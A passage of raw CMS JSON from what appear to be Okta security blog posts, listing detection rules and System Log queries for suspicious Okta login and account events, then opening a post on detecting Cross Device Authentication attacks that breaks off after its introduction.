ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" and outcome.reason eq \\\"Password Spray\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Successful Login Evaluated as High Risk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data
\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_successful_high_risk_user_logins.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_successful_high_risk_user_logins\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects successfully authenticated user logins based on Okta's Behavior Detection pattern analysis.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta 
Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/behavior-detection/logs-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Behavior Detection System Log events\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"outcome.result eq \\\"SUCCESS\\\" and debugContext.debugData.risk co \\\"HIGH\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta User Account 
Lockout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_account_lockout.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_account_lockout\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects when a user's account is locked out or a user account has reached the lockout limit.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper/how-adaptive-mfa-helps-mitigate-brute-force-attacks\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Adaptive MFA Helps Mitigate Brute Force 
Attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.account.lock\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Okta API Token Created\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" 
\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle Identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_new_api_token_created.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_new_api_token_created\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects when a new API token is created.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta 
Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/tokens/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tokens\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"system.api_token.create\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Out of Hours Successful 
Authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_login_out_of_hours.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_login_out_of_hours\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects out of hours successful authentication.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/User-Signin-and-Recovery-Events-in-the-Okta-System-Log\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Sign-in and Recovery Events in the Okta System 
Log\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Logins from Multiple Cities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle 
identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_logins_from_multiple_cities.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_logins_from_multiple_cities\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects user logins for the same user from different cities within 24 hours.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/behavior-detection/logs-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Behavior Detection System Log 
events\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We found this exercise to be fulfilling. Writing YARA-L queries is new to us, but they have been super easy to read and collaborate on. Even if you’re not a Chronicle customer, you might find it valuable to read the detection logic in Chronicle to frame your thinking about how you might go about detecting these types of threats.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What’s next?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once we’re happy with our detections, phishing-resistant factors and other control slices, where should we invest our energy next? I’d suggest considering what an adversary might now need to do for persistence and lateral movement. 
Perhaps they could socially engineer a new factor, a managed device or even a whole new account?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Best get thinking about how you’d detect:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User factors added or modified \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/#catalog\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"(user.mfa.factor*)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New users created (user.lifecycle.create)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Devices added to MDM\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Remote Monitoring and Management tool installation or execution\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"VM installation on workstations\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Duplicate hostnames\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Gouda 
luck!\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-05-01T18:16:44.238Z","secAuthor":[{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"<p>The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.</p>"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/articles/2025/04/detect-and-prevent-cross-device-auth","id":"cfbab762-327e-550b-9646-3cd93bc27450","title":"Detect and Prevent Cross Device Authentication","date":"2025-04-17T09:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So, you recently implemented phishing-resistant authentication policies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Firstly, congrats! You’ve significantly raised the bar for potential threat actors and have a far better chance of detecting a compromise going forward. This will force threat actors to shift their focus to compromising your end-user devices. So what does this actually look like and what else can you do?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Even with phishing resistant authentication in place, there are several techniques a threat actor could employ that leverage a compromised endpoint to successfully authenticate to Okta-protected resources. 
The threat model for FIDO authentication, for example, notes that there are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"limits to how much protection\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" an authenticator offers if the hardware it operates on is compromised.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One such example of this is what we call a ‘Cross Device Authentication (CDA) attack’ - this is when an attacker connects to a protected resource from their machine and forwards the required authentication flow through a machine they have previously compromised to gain unauthorized access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I won't go into all the details here, as this technique has previously been proposed and documented by other researchers (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.xpnsec.com/identity-providers-redteamers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"XPNSec\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://gitlab-com.gitlab.io/gl-security/security-tech-notes/red-team-tech-notes/okta-verify-bypass-sept-2024/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"GitLab\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Combatting CDA 
